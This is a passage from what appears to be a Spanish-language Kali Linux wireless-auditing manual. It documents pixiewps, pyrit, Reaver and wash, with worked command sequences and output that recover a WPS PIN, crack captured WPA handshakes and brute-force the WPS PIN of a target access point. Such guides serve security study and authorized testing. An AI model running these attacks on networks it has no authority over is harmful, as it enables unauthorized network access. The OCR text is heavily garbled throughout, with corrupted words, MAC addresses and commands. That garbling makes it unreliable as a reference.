• Entropía reducida de la semilla de 32 a 25 bits para la función pseudoaleatoria C LCG 

• Claves pequeñas de Diffie-Hellman: no es necesario especificar la clave de registrador 
público si se usa la misma opción con Reaver. 

El programa también intentará primero con E-SO = E-Sl = 0, luego intentará aplicar fuerza bruta a 
la semilla del PRNG si se especifica la opción -e-nonce. 

Uso: pixiewps <argumentos> 

Arg umentos requeridos: _ 


-e, —pke 

Clave pública DH del afiliado encontrada en MI 

-r, —pkr 

Clave pública DH del registrador encontrada en M2. Se puede evitar 
especificando —dh-small en Reaver y pixiewps. 

-s, —e-hashl 

E-Hashl encontrado en M3. Es el hash de la primera mitad del PIN. 

-z, —e-hash2 

E-Hash2 encontrado en M3. Es el hash de la segunda mitad del PIN. 

-a, —authkey 

Clave de la sesión de autenticación. Aunque para este parámetro se 
necesita una versión fied de Reaver o Bully, se puede evitar 
especificando las pequeñas claves Diffie-Hellman en Reaver y en 
pixiewps y suministrando —e-nonce, —r-nonce y —e-bssid. 

-n, —e-nonce 

Nonce del afiliado encontrado en MI 


Argumentos opcionales: 


-m, —r-nonce 

Registrar nonce encontrado en M2. Usado con otros parámetros 
para computar las claves de sesión. 

-b, —e-bssid 

Espcificar BSSID. Usado con otros parámetros para computar 
las claves de sesión. 

-S, —dh-small 

Pequeñas claves de Diífie-Hellman. Ea misma opción debe 
especificarse también en Reaver. Algunos puntos de acceso 
parecen tener errores y no se comportan correctamente con esta 
opción. Evite usarlo con Reaver cuando sea posible. 

-V, — verbosity 

Modo verbose 

- 0 , —output 

Escribir la salida en este fichero 

-j, -jobs 

Número de threads paralelos a usar 

-h, —help 

Visualizar la ayuda 

-V, —versión 

Visualizar la versión 

—mode N[,... N] 

Seleccionar los modos separados por comas. Por defecto auto. 
Modos: 1 - RT/MT/CE, 2 - eCos simple, 3 - RTL819x, 

4 - eCos simples! [Experimental], 5 - eCos Knuth 
[Experimental] 





—start [mm/]yyyy 
—end [mm/Jyyyy 

Eas feehas de inicio y finalización para el modo 3 son 
intercambiables. Si solo se especifica uno, la hora actual se 
utilizará para el otro. Ea fecha más temprana posible es 

01/1970, correspondiente a 0 (Tiempo de época de Unix), el 
último es 02/2038, correspondiente a 0x7EEEEEEE. Si se usa 
—forcé, pixiewps comenzará desde la hora actual y volver a 0. 

-7, —m7-ene 

Configuraciones cifradas encontradas en M7. Recuperar el 
WPA-PSK del afiliado y nonce secreto 2. Esta función solo 
funciona en algunos puntos de acceso vulnerables al modo 3. 

-5, —m5-ene 

Configuraciones cifradas encontradas en M5. Recuperar el 
secreto secreto del afiliado. Esta opción debe usarse junto con 
—m7-enc. Si —e-hashl y —e-hash2 también se especifican, 
pixiewps también recuperará el PIN de WPS 


root@kali:~# pixiewps \ 

> -a 

7f:de:ll;b9:69;lc:de:26;4a:21:a4:6f:eb;3d;b8:aa:aa:d7;30;09;09;32;b8:24:43:9b:e0;91;78:e7:6f:2c\ 

> -e 

d4:38:91:0d:4e:6e:15:fe:70;fí):97:a8:70:2a:b8:94;f5:75:74;bf:64:19:9f:92;82:9b;e0:2c:c0:a3:75;48;0 

8;8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:fí):f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:fl:da:d4:94:23:56: 

c7:2c:b0:f6:87:c7:77;d0:cc:ll;35:cf:b7:4f:bc:44;8d:ca:35:8a:78;3d:99:7f:2b:cf:44:21:d8:e2;0f:3c:7d 

:a4:72:c8:03:6f:77:2a:e9:fa:cl;e9:a8:2c:74:65:99:5a;e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab;80;db;3f:5 

f:18;7f:fa:fa:fl:57:74;b2:8d;a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:lf:55:32:a4:5d:73:8f:ab:9 

I:74;cf:ld:79:85;12:cl:81:f5:ea:a6;68:9d;8e:c7:c6:be;01;dc:d9:f8;68;80;ll;55;d7:44:6a\ 

> -r 

bc:ad:54:2f:88:44:7c;12:69;ef:34;31;4a:17:lc:92;bl;d7:06:4c:73;be:9f:d3:ed;87:63:74:10:46:0f:46: 

8c:36;b5;d4:a0;ba:af:85:9c:b2:30;42:d7:59:43:75:5a:d7:79;96:fb:ee:7b:66:db;b7:a8;ff:22:9c:a5:d3: 

b8;e7:c0:c4:5c:58:34:lf:56:a8:la:41:a8;d2:e8:f6;3e:c9;3a:93:d9:9b;59;5c:a8:e0:78:84:6c:fc:05:e8:7 

6;a3:e6:3b;33;94;4a:a9;ff:50;fb;60:fa:97:3b;6d;cc:04;fl;5e;36:24;a9:06:7a:f8:6b;00:e9:71;9d;89;be: 

9c:b2:9c:lf:ca:6d:d6:4d:ab:46:3d;b3:ll:lf:8d;40:f7:c8:a4:39:48:c5:ca:lb:f6:30;95:7d;d9;68:41;ef:0 

a:37:b2:4a:37:e4:a4;b0;dd;7e:cl:af:3e;66:ea:bf:16:0a:7a:8a:05;00;01;a4:29:77:a9:d4:81;d4:0e \ 

> -s 

90:5f:f5:7d;93:e5:c4:3c:62:0d:26:65:dd;59:57:d5:ba:ba:fl;b7:30;91:72:7c:54;94:38;08:le:13:35:38 

\ 

> -z 

b0:2b;07:50:28:e7:6e:5f:fa:27:lb:31;92:85:43:cb:c5:6a:ec:73;e2:27:c3:b9:80:ec:5b;ed:88;fí):le:ec\ 

> -n 00;00;00;00;00:00:00:00:00:00:00:00;00:00;00;00 

Pixiewps 1.4 

[?] Mode: 1 (RT/MT/CL) 

[*] SeedNl: - 

[*] Seed ESI: 0x00000000 

[*] Seed ES2: 0x00000000 

[*] PSKl: d4eb0e2a3815ela03d70db7431eb53a3 

[*] PSK2: d3b7e623f31d220a23ea07bb7f76658b 

[*] ESI: 00000000000000000000000000000000 

[*] ES2: 00000000000000000000000000000000 

[+] WPS pin: 04847533 

[*] Time taken: 0 s 4 ms 




23. pyrit 


Este programa busca contraseñas wifi a partir de ficheros de escaneo en formato pcap y con 
tratamiento offiine. 

pyrit permite crear bases de datos masivas de la fase de autenticación WPA/WPA2-PSK 
precalculada en un intercambio de espacio-tiempo. Al utilizar el poder computacional de las CPUs 
de múltiples núcleos y otras plataformas a través de ATI-Stream, Nvidia CUDA y OpenCL, 
actualmente es con mucho el ataque más poderoso contra uno de los protocolos de seguridad más 
utilizados del mundo. 

Uso; pyrit [opciones] comando 

Opciones: 


-b 

Elitros AccessPoint por BSSID 

-e 

Elitros AccessPoint por ESSID 

-h 

Imprimir ayuda para un determinado comando 

-i 

Nombre de archivo para la entrada es stdin) 

-0 

Nombre de archivo para la salida es stdout) 

-r 

Pichero de captura de paquetes en formato pcap 

-u 

URL del sistema de almacenamiento a utilizar. 

—all-handshakes 

Usar todos los handshakes en lugar del mejor. 

—aes 

Usar AES 


23.1. Comandos 

Los comandos van asociados a determinadas opciones o ninguna como benchmark. En las opciones 
que se tiene que cargar un fichero pcap, se puede obtener, ejecutando 
airodump wlanOmon -c 3 -w capture 

donde c es el canal y capture el nombre del fichero donde se guarda la información. 

Los comandos son: 

1. analyze 

Analizar uno o varios archivos de captura de paquetes en formato pcap y trata de detectar los puntos 
de acceso, las estaciones y los EAPOL-handshake. Por ejemplo: 
pyrit -r "test* .pcap" analyze 

muestra una lista de los puntos de acceso, estaciones asociadas y los EAPOL-handshakes que 
podrían ser identificados a partir de los datos capturados. Los handshakes se muestran ordenados 
por su calidad en: 

• Bueno. El handshake incluye el desafio desde el punto de acceso, la respuesta de la estación 
y la confirmación del punto de acceso. 

• Lactible, El handshake incluye la respuesta de la estación y la confirmación del punto de 
Acceso. El reto no fue capturado. 

• Malo. El handshake incluye el desafio desde el punto de acceso y la respuesta de la estación. 
La confirmación no fue capturada. 

Los hanshakes de la misma calidad están clasificados por lo cerca que los paquetes que componen 
el handshake están el uno al otro 




2. attack batch 

Atacar un EAPOL-handshake que se encuentra en el arehivo de eaptura de paquetes dada por la 
opeión -r eon las llaves maestras por parejas y las eontraseñass almaeenadas en la base de datos. Las 
opeiones-b y-e se pueden utilizar para espeeifiear el punto de aeeeso a ataear; se reeogió 
automátieamente si se omiten las dos opeiones. La eontraseña se eseribe en el nombre de arehivo 
dado por la opeión -o, si se especifica. Por ejemplo: 

pyrit -r test.peap -e MyNetwork -b 00:de:ad:o0:de:00 -o MyNetworkPassword.txt 
attaekbateh 

Por parejas claves maestras que han sido previamente calculadas y almacenadas en la base de datos 
se han tomado de allí todas las demás contraseñas se convierten en sus respectivas llaves maestras 
por parejas y se agregan a la base de datos para su posterior reutilización. LSSIDs se crean 
automáticamente en la base de datos si es necesario. Pyrit trabaja por la lista de los LAPOL- 
handshakes reconstruidas en easo de que la opeión - se suministra todos los handshakes. 

3. attaekeowpatty 

Ataear un LAPOL-handshake que se encuentra en el arehivo de eaptura de paquetes dada por la 
opción -r por parejas utilizando elaves maestras de un arehivo eowpatty similar dada por la opeión 
-i. Las opeiones-b y-e se pueden utilizar para espeeifiear el punto de aeeeso a ataear; se reeogió 
automátieamente si se omiten las dos opeiones. La eontraseña se eseribe en el nombre de 
archivo dado por la opción -o si se espeeifiea. El fiehero eowpatty puede ser eomprimido eon gzip y 
debe eoineidir eon el ESSID elegido. Por ejemplo: 

pyrit -r test.peap -e MyOwnNetwork -i MyOwnNetwork.cow.gz -o - attaek_eowpatty 
La propia base de datos de Pyrit no es toeada por un attaek eowpatty 

Pyrit ataea todos los EAPOL-handshakes al mismo tiempo, si la opeión - se suministra todos los 
hanshakes. Esto redueirá el througput. 

4. attaek_db 

Ataear un EAPOL-handshake que se encuentra en el arehivo de eaptura de paquetes dada por la 
opeión -r eon las llaves maestras por pares almaeenadas en la base de datos. Las opeiones -b y -e se 
pueden utilizar para espeeifiear el punto de aeeeso para atacar; se recogió automáticamente si se 
omiten las dos opeiones. La eontraseña se eseribe en el nombre de arehivo dado por la opeión -o, si 
se espeeifiea. Por ejemplo: 

pyrit -r test.peap -e MyOtherNetwork attaek db 

Sólo las elaves maestras de por parejas que se han eomputado previamente y se almaeenan en la 
base de datos son utilizadas por attaek db. Pyrit trabaja por la lista de los EAPOL-handshakes 
reeonstruidos en easo de que la opeión - se suministra todos los handshakes. 

5. attack_passthrough 

Ataear un EAPOL-handshake que se encuentra en el arehivo de eaptura de paquetes dada por la 
opeión -r con las contraseñas leídas desde el arehivo dado por la opeión -i. Las opeiones-b y-e se 
pueden utilizar para espeeifiear el punto de aeeeso a ataear; se reeogió automátieamente si se 
omiten las dos opeiones. La eontraseña se eseribe en el nombre de archivo dado por la opción -o, si 
se espeeifiea. Por ejemplo: 

pyrit -r test.peap -b 00:de:ad:be:ef:00 -i words.txt attaek_passthrough 
Este eomando evita la base de datos de pyrit y debe utilizarse sólo si el espaeio de almacenamiento 
es un problema. De lo eontario se debe eonsiderar el uso de attaek bateh. pyrit ataca todos los 
EAPOL-handshake al mismo tiempo, si la opeión - se suministra para todos los handshakes. 

ó.bateh 

Comienza a tradueir todas las contraseñas en la base de datos en sus respeetivas pares de elaves 
maestras y almaeenar los resultados en la base de datos. La opeión -e puede ser utilizada para 



restringir este eomando a un únieo ESSID, si está omitido, todos los ESSIDs se proeesan uno tras 
otro en orden indefinido. Por ejemplo: 
pyrit -e NETGEAR bateh 

Ea opeión -o se puede utilizar para espeeifiear un nombre de arehivo de los resultados, además 
deberán estar eseritos en formato binario eowpatty ’s. Ea opeión -e se eonvierte en obligatoria y el 
ESSID se erea automátieamente en la base de datos si es neeesario. Por parejas elaves maestras que 
han sido previamente ealeuladas y almaeenadas en la base de datos se exportan desde alli sin más 
transformaeión. Paradas Pyrit y salidas si un lOError se eleva al eseribir en el arehivo espeeifieado. 
Esto haee que sea muy eonveniente para los resultados de tuberías direetamente a otros programas, 
pero también mantener para su uso posterior. Por ejemplo: 

pyrit -e NETGEAR -o - bateh | eowpatty -d - -r wpatesteapture.eap -s NETGEAR 

7. benehmark 

Determina el rendimiento de los núeleos disponibles. 

8 .benehmarklong 

Versión de rendiminto más largo y preeiso (5 minutos) 

9. check_db 

Comprobar la base de datos si hay errores eomo la eorrupeión de datos o los errores de refereneia. 

10. ereate_essid 

Crea una o varias ESSID nuevas. Una sola ESSID puede ser dada por la opeión -e. Múltiples 
ESSIDs se pueden erear mediante el suministro de un arehivo (una por linea), a través de la opeión 
-i. 

11. deleteessid 

Eliminar un ESSID de la base de datos. Esto ineluye todos los resultados que pueden haber sido 
almaeenados para que ESSID en partieular. 

12. eval 

Contar todas las eontraseñas disponibles, todos los ESSIDs y sus respeeyivos resultados en la base 
de datos. 

13 .exporteowpatty 

Exportar resultados a un nuevo arehivo eowpatty 
14. export_hashdb 

Eseribe todos los resultados almaeenados aetualmente en la base de datos a la base de datos airolib- 
ng dada eon la opeión -o. La base de datos se erea eon un diseño de tabla por defeeto si el arehivo 
no existe todavia. La opeión -e se puede utilizar para limitar la exportaeión a un únieo ESSID. 

15 .import_passwords 

Leer el archivo dado por -i e importar una contraseña por línea a la base de datos. Las contraseñas 
pueden contener todos los caracteres (incluyendo nulo bytes) además de la terminación de nueva 
línea de caracteres \ n. Se ignoran las contraseñas que no son adecuados para ser utilizados con 
WPA-AVPA2-PSK. Almacenamiento ejecución de Pyrit garantiza que todas las contraseñas siguen 
siendo únicos en toda la base de datos. 

16. import_unique_passwords 

Importar contraseñas únicas desde un archivo, una por linea. Las eontraseñas pueden contener 



todos los caracteres (ineluyendo nulo bytes) además de la terminaeión de nueva línea de 
caraeteres \n. Se ignoran las contraseñas que no son adecuados para ser utilizados con 
WPA-/WPA2-PSK. Este eomando no eomprueba si están duplieadas las eontraseñas en el arehivo o 
entre el arehivo y la base de datos, sino que debe ser utilizado eon preeaueión para evitar que la 
base de datos tenga claves duplicadas. 

17. export_passwords 
Exportar contraseñas a un archivo 

IS.listcores 

Mostrar una lista de todos los módulos de hardware disponibles. 

19. hst_essids 

Mostrar una lista de todos ESSIDs almaeenados aetualmente en la base de datos. 

20. passthrough 

Eeer las eontraseñas del arehivo dado por la opeión -i y caleular sus pareadas elaves maestras para 
el ESSID dado por la opeión -e. Eos resultados se eseriben en el arehivo espeeificado por la opeión 
-o en formato binario eowpatty ’s y no se almaeenan en la base de datos para su uso posterior. 

21. relay 

Inieia el servidor para transmitir otro dispositivo de almaeenamiento a través de XME-RPC, otros 
olientes pueden utilizar el servidor oomo dispositivo de almaeenamiento. Esto permite tener aooeso 
a la red basado en una fuente de almaeenamiento que no proporoionan aooeso de red por su ouenta u 
ooultar una base de datos SQL detrás de un oortafuegos y dejar que los clientes tengan aoceso 
múltiple a la base de datos sólo a través de Pyrit de RPC-interfaoe. El puerto TCP 17934 debe estar 
abierto para que esta opeión funoione. 

22. selftest 

Ejeoutar una extensa autooomprobación durante unos 60 segundos. Se puede utilizar esta fimoión 
para deteotar los módulos rotos de hardware o red-olientes malioiosos. 

23. serve 

Iniciar un servidor que proporciona acceso al hardware de oomputaoión looal para ayudar a otros 
olientes Pyrit. La direooión IP del servidor debe añadirse al arehivo de oonfiguraoión oomo una lista 
separada por espaoio bajo known olients. Estos olientes ’rpo server-ajuste también se debe 
estableoer en' true '. El puerto 17935 TCP y UDP deben ser aocesibles. 

24. strip 

Analizar uno o más arohivos de paquetes de oaptura propuestos por la opeión -r, extraer sólo los 
paquetes que son neoesarios para la deteooión EAPOL-handshake y escribir en un nuevo nombre de 
arehivo por la opeión -o. 

25. stripLive 

Analizar un archivo de oaptura de paquetes dada por la opeión -r, extraer sólo los paquetes que son 
neoesarios para la deteooión EAPOL-handshake y esoribir un nuevo arehivo dado por la opeión -o. 

26. verify 

Verificar el 10% de los resultados por reoálculo. 

27. help 

Visualizar la ayuda 



23.2. Ejemplos 


Ejemplo 1 

Capturar el fiehero a usar en pyrit. 
airodump-ng wlanlmon -e 3 -w eapture 
Ejeeutar 

pyrit -r Vroot/Desktop/eapture-Ol.eap' analyze 

Pyrit 0.5.1 (C) 2008-2011 Eukas Eueg - 2015 John Mora 

https://github.oom/JPaulMora/Pyrit 

This oode is distributed under the GNU General Publio Eioense v3+ 

Parsing file Vroot/Desktop/marko-Ol.oap' (1/1)... 

Parsed 122 paokets (122 802.11-paokets), got 8 AP(s) 

#1: AooessPoint 84:61 :a0:61:39:90 (ATT9X3s2e4'): 

#2: AooessPoint oe:50:e3:08:ll:d4 ('Chioken_Easy_Or): 

#1: Station 84:0d:8e:8o:b0:lo, 4 handshake(s): 

#1: HMAC_SHA1_AES, good, spread 1 
#2: HMAC_SHA1_AES, good, spread 1 
#3: HMAC_SHA1_AES, good, spread 87 
#4: HMAC_SHA1_AES, good, spread 87 
#3: AooessPoint 6e:4d:73:96:78:a7 ('Edgardo'): 

#1: Station oo:29:f5:57:fo:98 
#4: AooessPoint o4:01:7o:57:69:a8 ('EILA-Guest'): 

#5: AooessPoint o4:01:7o:97:69:a8 ('EILA-STAEP'): 

#6: AooessPoint 6o:b0:oe:ad:le:53 ('MyCharterWiPi53-2G'): 

#7: AooessPoint b0:98:2b:4a:b4:d4 ('MySpeotrumWiPioe-2G'): 

#8: AooessPoint o4:01:7o:17:69:a8 ('PS-WL-MO'): 

pyrit -r '/root/Desktop/oapture-Ol.oap' -o savedpass attaok batoh 
Pyrit 0.5.1 (C) 2008-2011 Eukas Eueg - 2015 John Mora 
https://github.oom/JPaulMora/Pyrit 

This oode is distributed under the GNU General Publio Eioense v3+ 

Parsing fde '/root/Desktop/oapture-Ol.oap' (1/1)... 

Parsed 122 paokets (122 802.11-paokets), got 8 AP(s) 

Pioked AooessPoint oe:50:e3:08:ll:d4 ('Chioken Easy Ol') automatioally. 

Tried 447 PMKs so far; 250 PMKs per seoond. password 
The password is '123456789'. 

Ejemplo 2 

root@kali:'-'# pyrit benohmark 

Pyrit 0.5.1 (C) 2008-2011 Eukas Eueg - 2015 John Mora 
https://github.oom/JPaulMora/Pyrit 

This oode is distributed under the GNU General Publio Eioense v3+ 

Running benohmark (1353.0 PMKs/s)... / 

Computed 1352.97 PMKs/s total. 

#1: 'CPU-Core (SSE2/AES)': 464.7 PMKs/s (RTT 2.9) 

#2: 'CPU-Core (SSE2/AES)': 91.4 PMKs/s (RTT 10.3) 

#3: 'CPU-Core (SSE2/AES)': 742.3 PMKs/s (RTT 2.5) 

#4: 'CPU-Core (SSE2/AES)': 498.4 PMKs/s (RTT 3.6) 

Read a eapture file (/usr/share/doo/airoraok-ng/examples/wpa2.eapol.oap) and analyze it. 


Ejemplo 3 



root@kali:'-'# pyrit -r /usr/share/doc/aircrack-ng/examples/wpa2.eapol.cap analyze 
Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora 
https://github.com/JPaulMora/Pyrit 

This code is distributed under the GNU General Publie Lieense v3+ 

Parsing fde '/usr/share/doe/aireraek-ng/examples/wpa2.eapol.eap' (1/1)... 

Parsed 5 paekets (5 802.11-paekets), got 1 AP(s) 

#1: AeeessPoint 00:14:6e:7e:40:80 ('Harkonen'): 

#1: Station 00:13:46:fe:32:0e, 1 handshake(s): 

#1: HMAC_SHA1_AES, good, spread 1 

Create an ESSID (ereate_essid), speeifying the ñame found in the above analysis (-e Harkonen). 
Ejemplo 4 

root@kali:'-'# pyrit -e Harkonen ereate_essid 

Pyrit 0.5.1 (C) 2008-2011 Eukas Lueg - 2015 John Mora 

https://github.eom/JPaulMora/Pyrit 

This eode is distributed under the GNU General Publie Lieense v3+ 

Conneeting to storage at 'file://'... eonneeted. 

Created ESSID 'Harkonen' 

Read a password file (-i /usr/share/wordlists/metasploit/password.lst) and import them into the 
database (import_passwords). 

Ejemplo 5 

root@kali:~# pyrit -i /usr/share/wordlists/metasploit/password.lst import_passwords 
Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora 
https://github.eom/JPaulMora/Pyrit 

This code is distributed under the GNU General Public Lieense v3+ 

Conneeting to storage at 'file://'... eonneeted. 

88396 fines read. Elusfiing buffers.... 

All done. 

Compute the PMKs using the ESSID and passwords 
Ejemplo 6 

root@kafi:'-'# pyrit batch 

Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora 
https://github.eom/JPaulMora/Pyrit 

This eode is distributed under the GNU General Publie Lieense v3+ 

Conneeting to storage at 'file://'... eonneeted. 

Working on ESSID 'Harkonen' 

Proeessed all workunits for ESSID 'Harkonen'; 1756 PMKs per seeond. 

Batehproeessing done. 

Read the eapture fde (-r /usr/share/doe/aireraek-ng/examples/wpa2.eapol.eap) and attempt to erack 
the password (attack db). 

Ejemplo 7 

root@kah:~# pyrit -r /usr/share/doe/aireraek-ng/examples/wpa2.eapol.eap attaek_db 
Pyrit 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora 
https://github.eom/JPaulMora/Pyrit 

This eode is distributed under the GNU General Publie Lieense v3+ 

Conneeting to storage at 'file://'... eonneeted. 

Parsing file '/usr/share/doe/aireraek-ng/examples/wpa2.eapol.eap' (1/1)... 

Parsed 5 paekets (5 802.11-paekets), got 1 AP(s) 

Pieked AeeessPoint 00:14:6e:7e:40:80 ('Harkonen') automatieahy. 



Attacking handshake with Station 00:13:46:fe:32:0c... 

Tried 15877 PMKs so far (33.2%); 9788764 PMKs per second. 
The password is T2345678'. 



24. Reaver 


Reaver implementa un ataque de fuerza bruta eontra los PIN de Wifi Proteeted Setup (WPS) para 
reeuperar las frases de eontraseña WPA/WPA2. Reaver ha sido diseñado para ser un ataque robusto 
y práetieo eontra WPS y ha sido probado en una amplia variedad de puntos de aeeeso e 
implementaeiones de WPS. En promedio Reaver recuperará la frase de contraseña WPA/WPA2 del 
AP de destino en 4-10 horas, dependiendo del punto de acceso. En la práctica generalmente tomará 
la mitad de este tiempo para adivinar el pin WPS correcto y recuperar la frase de contraseña. 

Ea operativa es la siguiente: 

1. Autenticación y asociación 

2. Recepción de MI y envío de M2 (clave DH) 

3. Recepción de M3 y envío de M4, es decir, la primera parte del pin 

4. ¿Se ha recibido? En caso negativo, generar una nueva primera parte del pin, y realizar una 
desautenticación 

5. Envío de M6, es decir, la segunda parte del pin 

6. ¿Se ha recibido? En caso negativo, generar una nueva segunda parte del pin, y realizar una 
desautenticación 

7. Ein 


Uso: reaver <opciones> 
Argumentos requeridos: 


-i, —interface=<wlan> 

Nombre de la interfaz en modo monitor a usar 

-b, —bssid=<mac> 

BSSID del AP objetivo 


Argume ntos opcionales: 


-m, —mac=<mac> 

MAC del sistema 

-e, —essid=<ssid> 

ESSID del AP objetivo 

-c, —channel=<channel> 

Establecer el canal 802.11 para la interfaz. Implica el uso 
de la opción -f 

- 0 , —out-file=<file> 

Enviar la salida a un archivo de registro. Por defecto 
stdout 

-s, —session=<fde> 

Restaurar un archivo de sesión anterior 

-C, —exec=<command> 

Ejecutar el comando suministrado después de la 
recuperación exitosa del pin, por ejemplo, pixiewps. 

-D, —daemonize 

Modo daemon 





-a, —auto 

Deteetar automátieamente las mejores opeiones 
avanzadas para el AP objetivo 

-f, —fixed 

Deshabilitar el salto de eanal 

-5, —5ghz 

Usar eanales 5GHz 802.11 

-V, —verboso 

Mode verboso 

-q, —quiet 

Solo mostrar mensajes oritioos 

-h, —help 

Visualizar la ayuda 


Opciones avanzadas: 


-p, —pin=<wps pin> 

Usar el pin WPS de 4 u 8 digitos espeoifioado 

-d, —delay=<seoonds> 

Estableoer el retardo entre los intentos de pin. Por 
defeoto 1 

-1, —look-delay=<seoonds> 

Estableoer el tiempo de espera si el AP bloquea los 
intentos de pin WPS. Por defeoto 60 

-g, —max-attempts=<num> 

Salir después de num intentos de pin 

-X, —fail-wait=<seoonds> 

Configurar el tiempo de espera después de 10 fallos 
inesperadas. Por defeoto 0 

-r, —reourring-delay=<x:y> 

Esperar y segundos después de oada x intentos de pin 

-t, —timeout=<seoonds> 

Estableoer el tiempo de espera de reoepoión. Por 
defeoto 5 

-T, —m57-timeout=<seoonds> 

Estableoer el periodo de espera M5/M7. Por defeoto 
0,20 

-A, —no-assooiate 

No asooiarse oon el AP 

-N, —no-naoks 

No enviar mensajes NACK ouando se reoiben 
paquetes fuera de orden 

-S, —dh-small 

Usar pequeñas olaves DH para mejorar la velooidad 

-E, —ignore-looks 

Ignorar el estado bloqueado informado por el AP 
objetivo 

-E, —eap-terminate 

Terminar oada sesión WPS oon un paquete EAP EAIE 

-n, —naok 

El AP objetivo siempre envia un NACK. Por defeoto 
Auto 

-w, —win7 

Mimio un registrador de Windows 7. Por defeoto Ealse 


Habitualmente, el únieo argumento requerido para Reaver es el nombre de la interfaz y el BSSID 
del AP objetivo, por ejemplo: 

reaver -i monO -b 00:01:02:03:04:05 
Es muy reeomendable las opeiones -S -N y -vv 

reaver -i monO -b 00:01:02:03:04:05 -S -N -vv 

El eanal y el SSID del AP objetivo son identifieados automátieamente por Reaver, a menos que se 
espeeique explieitamente en la linea de eomando: 

reaver -i monO -b 00:01:02:03:04:05 -o 11 -e linksys 





Por defecto, si el AP cambia canales, reaver también cambiará su canal. Sin embargo está 
caracteristica puede ser desactivada fijando el canal de la interfaz, 
reaver -i monO -b 00:01 ;02;03;04;05 —fixed 

El tiempo de espera de recepción por defecto es de 5 segundos. Este tiempo de espera puede ser 
configurado manualmente si fuera necesario. El tiempo de espera minimo es 1 segundo: 
reaver -i monO -b 00:01:02:03:04:05 -t 2 

El tiempo de retraso por defecto entre intentos de pin es de 1 segundo. Este valor puede ser 
incrementado o decrementado a cualquiera valor entero no negativo. Eín valor de cero significa sin 
retraso: 

reaver -i monO -b 00:01:02:03:04:05 -d 0 

Algunos APs bloquearán temporalmente su estado WPS, normalmente durante 5 minutos o menos, 
cuando es detectada una actividad sospechosa. Por defecto cuando se detecta un estado 
bloqueado, reaver comprobará el estado cada 315 segundos (5 minutos y 15 segundos) y no 
continuará haciendo fuerza bruta a los pins hasta que el estado del WPS esté desbloqueado. Esta 
comprobación puede ser incrementada o decrementada a cualquier valor entero no negativo: 
reaver -i monO -b 00:01:02:03:04:05 —lockdelay=250 

Con el modo verbose -vv, se mostrará cada número pin intentado, 
reaver -i monO -b 00:01:02:03:04:05 -vv 

El tiempo de espera por defecto para recibir los mensajes de respuesta del WPS M5 y M7 es de 0,1 
segundos. Este tiempo de espera puede ser fijado manualmente si fuese necesario. Tiempo de espera 
máximo 1 segundo. 

reaver -i monO -b 00:01:02:03:04:05 -T .5 

Algunas implementaciones WPS pobres tirarán la conexión cuando se suministre un pin inválido en 
vez de responder con un mensaje NACK como dicen las especificaciones. Teniendo en cuenta esto, 
si se alcanza el tiempo de espera de mensaje M5/M7, es tratado por defecto como un NACK. Sin 
embargo si se sabe que el AP envia NACKS como lo hacen la mayoría, esta caracteristica puede ser 
desactivada para mayor exactitud. Esta opción está ampliamente en desuso ya que reaver 
autodetectará si un AP responde adecuadamente conNACKs o no: 
reaver -i monO -b 00:01:02:03:04:05 —nack 

Aunque a la mayoría de los APs no les importa, enviar un mensaje EAP EAIE para cerrar una sesión 
WPA a veces es necesario. Por defecto esta caracteristica esta deshabilitada, pero puede 
habilitarse para aquellos APs que la necesiten. 

reaver -i monO -b 00:01:02:03:04:05 —eap-terminate 

Cuando se encuentran 10 errores WPS consecutivos no esperados, se mostrará un mensaje de 
advertencia. Como esto es una señal de que el AP está limitado el ratio de intentos del pin o 
simplemente siendo desbordado, se dejará una pausa cuando aparezcan estos mensajes: 
reaver -i monO -b 00:01:02:03:04:05 —fail-wait=360 

Ejemplo 1 

Primero se ha de ejecutar 

reaver -i (interface en modo monitor) - b (BSSID del objetivo) -K 1 -vvv -N 
Esto dará el pin con 8 cifras en 1 o 2 minutos. 

A continuación ejecutar 

reaver -i (interface en modo monitor) - b (BSSID del objetivo) -p (PIN) -vvv -N 



Esto dará la contraseña. 


Ejemplo 2 

1. Ejeeutar airmon-ng stop wlanO 

2. Ejeeutar airodump-ng wlanO 

3. En el paso anterior, podemos eneontrar el punto de aeeeso eon el algoritmo de eifrado WPA2 y 
anotar el número del eanal AP. Ahora deseubriremos si el AP objetivo tiene WPS habilitado o no, 
ejeeutando wash -i wlanO -o 8 -C -s 

Si el estado WPS bloqueado es No, entonees estamos listos para descifrar y pasar al paso siguiente 

4. Ejeeutar reaver -i <your_interface> -b <wi-fi vietim MAC address> -c <eanal> —fail-wait=360 
Puede tardar mueho tiempo eomo unas 5 horas en deseifrar la eontraseña WPA2 de 19 earaeteres, 
pero depende del hardware y tarjeta inalámbriea. 



25. Wash 


Wash es una utilidad para identificar puntos de acceso habilitados para WPSy sus caracteristicas 
principales. Puede realizar encuestas desde una interfaz en vivo o puede escanear una lista de 
archivos pcap. 

Con airodump se ve todos los enrutadores, pero wash ve los demás pero no el propio. 

Uso: wash <argumentos> 

Argumentos requeridos: 


-i, —interface=<iface> 

Interfaz por donde capturar los paquetes 

-f, -file [FILEl FILE2 EIEE3 ...] 

Eeer paquetes de archivos de captura 


Argumentos opcionales: 


-c, —channel=<num> 

Canal a escuchar. Por defecto auto 

-n, —probes=<num> 

Número máximo de sondas para enviar a cada AP en 
modo de escaneo. Por defecto 15 

-a, —all 

Mostrar una lista de todos los puntos de acceso, 
incluidos aquellos sin WPS habilitado. 

-j, -json 

Ea información WPS extendida (serie, modelo ...) de la 
respuesta de la sonda AP se imprimirá en el terminal en 
formato json 

-E, -ignore-fes 

Ignorar los errores de la suma de comprobación 

-2, -2ghz 

Usar los canales 2,4GHz 802.11 

-5, —5ghz 

Usar los canales 5GHz 802.11 

-s, —sean 

Usar el modo de escaneo 

-u, —survey 

Usar el modo de encuesta. Es el modo predeterminado 

-h, —help 

Visualizar la ayuda 





26. Wifitap 


Wifitap es una prueba de eoneepto para la comunicaeión a través de redes WiFi que utilizan 
inyección de tráfico. Wifitap permite que cualquier aplicación envíe y reciba paquetes IP utilizando 
la captura y la inyección de tráfico 802.11 a través de una red WiFi, simplemente configurando wjO, 
lo que significa: 

